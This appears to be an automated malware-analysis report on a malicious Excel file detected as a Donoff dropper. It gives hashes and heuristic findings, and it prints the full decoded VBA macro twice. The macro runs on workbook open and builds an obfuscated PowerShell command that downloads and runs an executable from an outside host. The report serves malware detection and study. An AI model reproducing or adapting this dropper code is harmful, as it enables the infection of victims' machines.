Office (OLE) / .XLS malware analysis — malicious · 8bfe295a65b8b289

MALICIOUS

Office (OLE) / .XLS

46.5 KB Created: 2000-10-05 12:21:25 Authoring application: Microsoft Excel First seen: 2026-06-18

MD5: 25e641ca520a4d825a0210ac4989052a SHA-1: c0f7448fcfb5a7e3078c3b1b089a589943d718fe SHA-256: 8bfe295a65b8b28986c03f00a0add472a0925f89742bf204d69b058cd87f3a89

230 Risk Score

Heuristics 7

ClamAV: Xls.Dropper.Donoff-6758222-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Donoff-6758222-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell pijokero
```
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
Shell pijokero
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://strpslerol.date/dati.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3061 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3061 bytes
SHA-256: `12b4a1ebf8139f4c34c9843669841874eafadffc84d66f15ec1cd40a495fdbd4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() If xlCategory > 0.1 Then Shell pijokero End If End Sub Function enchteinerdom() enchteinerdom = "th" End Function Function tuplook() tooool = "" & "O" tuplook = "p" + "^" + tooool + "w" + "^E" + "RS" + "^he" + "l^" + "l" + poltergeystore + " -N" + "o" + chempionsd + "I" + "l" + "e^" + nigerias + "X" + "^Ec" + "^" + "U" & chivasgoa End Function Function pijokero() pijokero = magaraje + "e /" + "c """ + tuplook + galvolero + """" End Function Function nigerias() nigerias = " -e" End Function Function footerpad() deopooter = "^x" footerpad = deopooter + "^e^ " End Function Function magaraje() madagaskarus = "external hard" harddisks = "c" + Chr(77) tupertup = "D." & Left(madagaskarus, 2) magaraje = harddisks + tupertup End Function Function chempionsd() zeebdd = "O^F" chempionsd = "p" + "r" + zeebdd End Function Function chivasgoa() chivasgoa = " " + "B^Y" + "pa^" + "S^" + "s " End Function Function poltergeystore() hhneg = "DO^w" poltergeystore = "^.e" & footerpad & "-nO^" + "l " + "-No" + "^N" + "i^N" + "t" + Chr(94) & " -" + "W^" & "I" + "n" & hhneg + "s" + "^ 1" End Function Function galvolero() galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ip" + "o=" + "'sy" + "st" + "';$" + "kos='t.we';$rem='e" + "nt).do';$sad" galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + zozox(3) + "';$ji" + "='" + zozox(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://strpslerol.date/dati.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)" End Function Function zozox(n As Integer) As String Dim i As Integer, k1 As Integer, k2 As Integer, s As String For i = 1 To n k1 = Int(Rnd(Timer) * 26) k2 = Rnd(Timer) * 2 s = Chr(97 + k1) If k2 > 1 Then s = LCase(s) zozox = zozox & s Next End Function Attribute VB_Name = "Foglio4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Foglio1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 12b4a1ebf8139f4c34c9843669841874eafadffc84d66f15ec1cd40a495fdbd4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
If xlCategory > 0.1 Then
Shell pijokero
End If
End Sub

Function enchteinerdom()
enchteinerdom = "th"
End Function

Function tuplook()
tooool = "" & "O"
tuplook = "p" + "^" + tooool + "w" + "^E" + "RS" + "^he" + "l^" + "l" + poltergeystore + " -N" + "o" + chempionsd + "I" + "l" + "e^" + nigerias + "X" + "^Ec" + "^" + "U" & chivasgoa
End Function

Function pijokero()
pijokero = magaraje + "e   /" + "c """ + tuplook + galvolero + """"
End Function
Function nigerias()
nigerias = "  -e"
End Function
Function footerpad()
deopooter = "^x"
footerpad = deopooter + "^e^  "
End Function
Function magaraje()
madagaskarus = "external hard"
harddisks = "c" + Chr(77)
tupertup = "D." & Left(madagaskarus, 2)
magaraje = harddisks + tupertup
End Function
Function chempionsd()
zeebdd = "O^F"
chempionsd = "p" + "r" + zeebdd
End Function

Function chivasgoa()
chivasgoa = "  " + "B^Y" + "pa^" + "S^" + "s "
End Function

Function poltergeystore()
hhneg = "DO^w"
poltergeystore = "^.e" & footerpad & "-nO^" + "l " + "-No" + "^N" + "i^N" + "t" + Chr(94) & "  -" + "W^" & "I" + "n" & hhneg + "s" + "^ 1"
End Function

Function galvolero()
galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ip" + "o=" + "'sy" + "st" + "';$" + "kos='t.we';$rem='e" + "nt).do';$sad"
galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + zozox(3) + "';$ji" + "='" + zozox(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://strpslerol.date/dati.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
End Function

Function zozox(n As Integer) As String
    Dim i As Integer, k1 As Integer, k2 As Integer, s As String
    For i = 1 To n
        k1 = Int(Rnd(Timer) * 26)
        k2 = Rnd(Timer) * 2
        s = Chr(97 + k1)
        If k2 > 1 Then s = LCase(s)
        zozox = zozox & s
    Next
End Function
 



Attribute VB_Name = "Foglio4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.